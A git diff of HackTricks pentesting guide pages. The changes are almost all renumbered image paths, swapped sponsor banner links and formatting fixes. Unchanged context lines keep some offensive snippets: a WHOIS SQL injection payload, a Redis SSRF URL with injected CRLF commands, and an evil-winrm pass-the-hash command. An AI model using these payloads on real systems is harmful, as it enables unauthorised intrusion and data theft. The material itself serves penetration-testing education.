--- a/network-services-pentesting/1026-pentesting-rusersd.md
+++ b/network-services-pentesting/1026-pentesting-rusersd.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
 
 This protocol will provide you the usernames of the host. You may be able to find this services listed by the port-mapper service like this:
 
-![](<../.gitbook/assets/image (1038).png>)
+![](<../.gitbook/assets/image (1041).png>)
 
 ### Enumeration
 
diff --git a/network-services-pentesting/1099-pentesting-java-rmi.md b/network-services-pentesting/1099-pentesting-java-rmi.md
index 9fac79c12..b817c1b11 100644
--- a/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %}
 
 ## Basic Information
 
@@ -331,13 +331,13 @@ Entry_1:
   Command: rmg enum {IP} {PORT}
 ```
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %}
 
 <details>
 
diff --git a/network-services-pentesting/11211-memcache/memcache-commands.md b/network-services-pentesting/11211-memcache/memcache-commands.md
index 2dee67897..cc06b08b4 100644
--- a/network-services-pentesting/11211-memcache/memcache-commands.md
+++ b/network-services-pentesting/11211-memcache/memcache-commands.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -146,7 +146,7 @@ END
 This at least helps to see if any keys are used. To dump the key names from a PHP script that already does the memcache access you can use the PHP code from [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html).
 
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/113-pentesting-ident.md b/network-services-pentesting/113-pentesting-ident.md
index c88739a03..57346a693 100644
--- a/network-services-pentesting/113-pentesting-ident.md
+++ b/network-services-pentesting/113-pentesting-ident.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=113-pentesting-ident" %}
 
 ## Basic Information
 
@@ -40,15 +40,15 @@ PORT    STATE SERVICE
 
 If a machine is running the service ident and samba (445) and you are connected to samba using the port 43218. You can get which user is running the samba service by doing:
 
-![](<../.gitbook/assets/image (840).png>)
+![](<../.gitbook/assets/image (843).png>)
 
 If you just press enter when you conenct to the service:
 
-![](<../.gitbook/assets/image (156).png>)
+![](<../.gitbook/assets/image (159).png>)
 
 Other errors:
 
-![](<../.gitbook/assets/image (356).png>)
+![](<../.gitbook/assets/image (359).png>)
 
 ### Nmap
 
@@ -91,12 +91,12 @@ ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
 
 identd.conf
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=113-pentesting-ident) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=113-pentesting-ident" %}
 
 ## HackTricks Automatic Commands
 
diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md
index 4e3628a88..48ebf1250 100644
--- a/network-services-pentesting/135-pentesting-msrpc.md
+++ b/network-services-pentesting/135-pentesting-msrpc.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -122,7 +122,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
 * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
 * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/network-services-pentesting/15672-pentesting-rabbitmq-management.md
index 1e6608137..74890e61c 100644
--- a/network-services-pentesting/15672-pentesting-rabbitmq-management.md
+++ b/network-services-pentesting/15672-pentesting-rabbitmq-management.md
@@ -26,7 +26,7 @@ You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672
 In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\
 The main page should looks like this:
 
-![](<../.gitbook/assets/image (333).png>)
+![](<../.gitbook/assets/image (336).png>)
 
 ## Enumeration
 
@@ -41,7 +41,7 @@ service rabbitmq-server restart
 
 Once you have correctly authenticated you will see the admin console:
 
-![](<../.gitbook/assets/image (438).png>)
+![](<../.gitbook/assets/image (441).png>)
 
 Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections`
 
diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md
index 1713031b6..e66b6119b 100644
--- a/network-services-pentesting/1723-pentesting-pptp.md
+++ b/network-services-pentesting/1723-pentesting-pptp.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Basic Information
 
@@ -43,6 +43,7 @@ nmap –Pn -sSV -p1723 <IP>
 ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp)
 
 ## Vulnerabilities
+
 * [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
 * [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
 
@@ -55,7 +56,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
index 8d249c07e..741a8f329 100644
--- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
+++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Basic Information
 
@@ -52,7 +52,7 @@ For instance, if the broker rejects the connection due to invalid credentials, t
 }
 ```
 
-![](<../.gitbook/assets/image (973).png>)
+![](<../.gitbook/assets/image (976).png>)
 
 ### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
 
@@ -152,7 +152,7 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md
index b819930be..0e91dcef7 100644
--- a/network-services-pentesting/2375-pentesting-docker.md
+++ b/network-services-pentesting/2375-pentesting-docker.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ### Docker Basics
 
@@ -290,22 +290,22 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
 * You can use the tool [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) to **inspect your Dockerfile** and find all kinds of misconfigurations. Each misconfiguration will be given an ID, you can find here [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) how to fix each of them.
   * `dockerfilelinter -f Dockerfile`
 
-![](<../.gitbook/assets/image (173).png>)
+![](<../.gitbook/assets/image (176).png>)
 
 * You can use the tool [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) to **inspect your Dockerfile** and find all kinds of misconfigurations.
   * `dockerfilelint Dockerfile`
 
-![](<../.gitbook/assets/image (209).png>)
+![](<../.gitbook/assets/image (212).png>)
 
 * You can use the tool [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) to **inspect your Dockerfile** and find all kinds of misconfigurations.
   * `dockerlint Dockerfile`
 
-![](<../.gitbook/assets/image (68).png>)
+![](<../.gitbook/assets/image (71).png>)
 
 * You can use the tool [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) to **inspect your Dockerfile** and find all kinds of misconfigurations.
   * `hadolint Dockerfile`
 
-![](<../.gitbook/assets/image (498).png>)
+![](<../.gitbook/assets/image (501).png>)
 
 #### Logging Suspicious activity
 
@@ -362,10 +362,9 @@ You can use auditd to monitor docker.
 * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
 * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
 
-
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -375,7 +374,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md
index f51adb97d..39763b760 100644
--- a/network-services-pentesting/27017-27018-mongodb.md
+++ b/network-services-pentesting/27017-27018-mongodb.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -131,7 +131,7 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a
 
 ***
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
index 7ded0b684..2c3887515 100644
--- a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
+++ b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md
@@ -20,7 +20,7 @@ The **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as
 
 Upon joining a network, a Target Service announces its presence by broadcasting a **multicast Hello**. It remains open to receiving **multicast Probes** from Clients that are on the lookout for services by Type, an identifier unique to the endpoint (e.g., **NetworkVideoTransmitter** for an IP camera). In response to a matching Probe, a Target Service may send a **unicast Probe Match**. Similarly, a Target Service could receive a **multicast Resolve** aimed at identifying a service by name, to which it may reply with a **unicast Resolve Match** if it is the intended target. In the event of leaving the network, a Target Service attempts to broadcast a **multicast Bye**, signaling its departure.
 
-![](<../.gitbook/assets/image (686).png>)
+![](<../.gitbook/assets/image (689).png>)
 
 **Default port**: 3702
 
diff --git a/network-services-pentesting/43-pentesting-whois.md b/network-services-pentesting/43-pentesting-whois.md
index d0e03d84c..51566d308 100644
--- a/network-services-pentesting/43-pentesting-whois.md
+++ b/network-services-pentesting/43-pentesting-whois.md
@@ -44,7 +44,7 @@ echo "domain.ltd" | nc -vn <HOST> <PORT>
 
 Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response:
 
-![](<../.gitbook/assets/image (298).png>)
+![](<../.gitbook/assets/image (301).png>)
 
 Also, the WHOIS service always needs to use a **database** to store and extract the information. So, a possible **SQLInjection** could be present when **querying** the database from some information provided by the user. For example doing: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` you could be able to **extract all** the **information** saved in the database.
 
diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md
index 9187ea18c..d7b243654 100644
--- a/network-services-pentesting/4786-cisco-smart-install.md
+++ b/network-services-pentesting/4786-cisco-smart-install.md
@@ -12,11 +12,10 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 ## Basic Information
 
 **Cisco Smart Install** is a Cisco designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. **By default, Cisco Smart Install is active on Cisco hardware and uses the transport layer protocol, TCP, with port number 4786.**
@@ -48,14 +47,13 @@ The address of the target switch is **10.10.100.10 and CSI is active.** Load SIE
 ~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
 ```
 
-<figure><img src="../.gitbook/assets/image (770).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (773).png" alt=""><figcaption></figcaption></figure>
 
 The switch configuration **10.10.100.10** will be in the **tftp/** folder
 
-<figure><img src="../.gitbook/assets/image (1113).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1116).png" alt=""><figcaption></figcaption></figure>
 
-
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md
index 75d0d55db..c178a2293 100644
--- a/network-services-pentesting/5985-5986-pentesting-winrm.md
+++ b/network-services-pentesting/5985-5986-pentesting-winrm.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -71,11 +71,11 @@ Test-WSMan <target-ip>
 
 The response should contain information about the protocol version and wsmid, signifying that WinRM is set up correctly.
 
-![](<../.gitbook/assets/image (579).png>)
+![](<../.gitbook/assets/image (582).png>)
 
 * Conversely, for a target **not** configured for WinRM, the would result in no such detailed information, highlighting the absence of a proper WinRM setup.
 
-![](<../.gitbook/assets/image (455).png>)
+![](<../.gitbook/assets/image (458).png>)
 
 ### Execute a command
 
@@ -85,7 +85,7 @@ To execute `ipconfig` remotely on a target machine and view its output do:
 Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
 ```
 
-![](<../.gitbook/assets/image (148).png>)
+![](<../.gitbook/assets/image (151).png>)
 
 You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
 
@@ -126,7 +126,7 @@ Enter-PSSession $sess
 Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
 ```
 
-![](<../.gitbook/assets/image (1006).png>)
+![](<../.gitbook/assets/image (1009).png>)
 
 **The session will run in a new process (wsmprovhost) inside the "victim"**
 
@@ -173,7 +173,7 @@ winrm quickconfig
 winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
 ```
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -226,7 +226,7 @@ To use evil-winrm to connect to an **IPv6 address** create an entry inside _**/e
 evil-winrm -u <username> -H <Hash> -i <IP>
 ```
 
-![](<../.gitbook/assets/image (677).png>)
+![](<../.gitbook/assets/image (680).png>)
 
 ### Using a PS-docker machine
 
@@ -343,7 +343,7 @@ Entry_2:
 
 ​
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md
index eabb86bd8..1bf771403 100644
--- a/network-services-pentesting/6000-pentesting-x11.md
+++ b/network-services-pentesting/6000-pentesting-x11.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -188,7 +188,7 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh
 
 * `port:6000 x11`
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md
index 985aa955a..a09b7afbf 100644
--- a/network-services-pentesting/6379-pentesting-redis.md
+++ b/network-services-pentesting/6379-pentesting-redis.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -123,7 +123,7 @@ Find more interesting information about more Redis commands here: [https://lzone
 
 Inside Redis the **databases are numbers starting from 0**. You can find if anyone is used in the output of the command `info` inside the "Keyspace" chunk:
 
-![](<../.gitbook/assets/image (763).png>)
+![](<../.gitbook/assets/image (766).png>)
 
 Or you can just get all the **keyspaces** (databases) with:
 
@@ -160,7 +160,7 @@ DUMP <key>
 
 **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -346,7 +346,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
 
 _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/69-udp-tftp.md b/network-services-pentesting/69-udp-tftp.md
index a5997d035..f4880aa48 100644
--- a/network-services-pentesting/69-udp-tftp.md
+++ b/network-services-pentesting/69-udp-tftp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -60,7 +60,7 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
 * `port:69`
 
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
index 352f6a0a1..daa57521d 100644
--- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -191,7 +191,7 @@ msf  exploit(tomcat_mgr_deploy) > show options
 * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module)
 * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
 
-<figure><img src="../.gitbook/assets/image (377).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md
index a3c55d394..52f7d048f 100644
--- a/network-services-pentesting/8086-pentesting-influxdb.md
+++ b/network-services-pentesting/8086-pentesting-influxdb.md
